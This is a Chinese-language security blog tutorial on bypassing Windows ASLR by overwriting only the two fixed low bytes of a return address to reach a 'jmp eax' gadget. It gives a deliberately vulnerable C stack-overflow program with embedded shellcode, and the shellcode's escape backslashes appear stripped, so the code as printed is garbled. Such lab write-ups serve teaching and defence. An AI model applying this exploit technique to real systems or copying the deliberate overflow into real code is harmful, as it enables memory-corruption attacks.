Windows下ASLR机制绕过

  • A+
所属分类:安全文章

Windows下ASLR机制绕过

扫一扫关注公众号,长期致力于安全研究

前言:本文主要讲解ASLR机制根据返回地址来绕过



0x01 前言

windows vista开始后,就启用了地址随机化处理,这样做也是为了程序的安全性,但是还是存在以下缺陷:

虽然模块的加载基址变化了,但是各模块的入口点(Entry 那列)地 址的低位 2 个字节是不变的,也就是说映像随机化只是对加载基址的前 2 个字节做了随机处理。例如,某个模块的入口地址为 0x12345678,那么系统重启的它的入口地址可能会变为 0x43215678,地址的前 2 个字节是随机的,而后两个字节 0x5678 是固定的。

    编译器随机基址开启,一般编译器默认都开启了

Windows下ASLR机制绕过


0x02 实战讲解

既然上面我们已知,前两个字节是随机,后两个字节可控且固定的。那么通过栈溢出到返回地址,找一条jmp指令跳转到shellcode执行。

伪代码思路讲解:

    首先shellcode地址假设存放在esp栈顶

    程序第一次运行的地址 0x66661234  (指令地址是 jmp esp)

    程序第二次运行的地址 0x77771234  (指令地址是 jmp esp)

    两次运行,虽说前两个字节随机,但是后两个字节1234还是不变的,还是可以成功指向到jmp esp的,这就好比 6666为你的地基,地基+1234则是jmp esp指令,而当程序第二次运行的时候,7777为你的地基,地基+1234还是jmp esp指令。


全部代码如下,一个经典的栈溢出,但是采用了地址随机化,最后两个字节"xadxbd"为返回地址处。

char shellcode[] ="xFCx68x6Ax0Ax38x1Ex68x63x89xD1x4Fx68x32x74x91x0C""x8BxF4x8Dx7ExF4x33xDBxB7x04x2BxE3x66xBBx33x32x53""x68x75x73x65x72x54x33xD2x64x8Bx5Ax30x8Bx4Bx0Cx8B""x49x1Cx8Bx09x8Bx69x08xADx3Dx6Ax0Ax38x1Ex75x05x95""xFFx57xF8x95x60x8Bx45x3Cx8Bx4Cx05x78x03xCDx8Bx59""x20x03xDDx33xFFx47x8Bx34xBBx03xF5x99x0FxBEx06x3A""xC4x74x08xC1xCAx07x03xD0x46xEBxF1x3Bx54x24x1Cx75""xE4x8Bx59x24x03xDDx66x8Bx3Cx7Bx8Bx59x1Cx03xDDx03""x2CxBBx95x5FxABx57x61x3Dx6Ax0Ax38x1Ex75xA9x33xDB""x53x68x77x65x73x74x68x66x61x69x6Cx8BxC4x53x50x50""x53xFFx57xFCx53xFFx57xF8x90x90x90x90x90x90x90x90""x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90""x90x90x90""xadxbd";void test(){  printf("shellcode:%d", sizeof(shellcode));  char buf[204] = { 0 };  memcpy(buf, shellcode, sizeof(buf)+6);}int _tmain(int argc, _TCHAR* argv[]){  printf("123123");  test();  return 0;}


OD分析,当执行完memcpy函数之后,eax存放的就是局部变量栈中的shellcode起始位置。 

Windows下ASLR机制绕过


既然shellcode的地址存放在eax寄存器中,那就覆盖返回地址,覆盖内容为jmp eax,这里通过一个插件寻找

Windows下ASLR机制绕过

成功找到,0042bdad,既然启用了地址随机化,那么只需要拿后两个字节的值,bdad即可。

Windows下ASLR机制绕过


当执行到ret的时候,后面的bdad就是写死的值了,不论程序基址怎么变,都不会影响的。

Windows下ASLR机制绕过


之后F9,成功运行shellcode

Windows下ASLR机制绕过


在反复正常运行程序,也会成功执行shellcode,成功绕过ASLR

Windows下ASLR机制绕过




11111
微信搜索关注 "安全族" 长期致力于安全研究


下方扫一下扫,即可关注

Windows下ASLR机制绕过




本文始发于微信公众号(安全族):Windows下ASLR机制绕过

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: